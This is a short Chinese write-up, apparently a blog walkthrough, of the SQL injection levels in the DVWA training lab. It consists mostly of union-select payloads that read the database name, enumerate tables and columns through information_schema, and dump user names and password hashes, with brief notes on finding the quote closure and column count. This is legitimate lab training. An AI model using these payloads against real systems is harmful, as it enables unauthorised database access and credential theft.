赞
踩
部署靶场就不再赘述了,修改难度后自行开始闯关吧~
目录
- 1' union select database(),2#
1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='dvwa'#
1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='dvwa'#
- 1' union select group_concat(user),group_concat(password) from users#
id=1 union select 1,database()&Submit=Submit
所以确认是 单引号闭合,先尝试直接order by 探测列数看是否可以探测
order by 2显示正常
order by 3显示报错
1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#
1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='dvwa'#
- 1' union select group_concat(user),group_concat(password) from users#
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。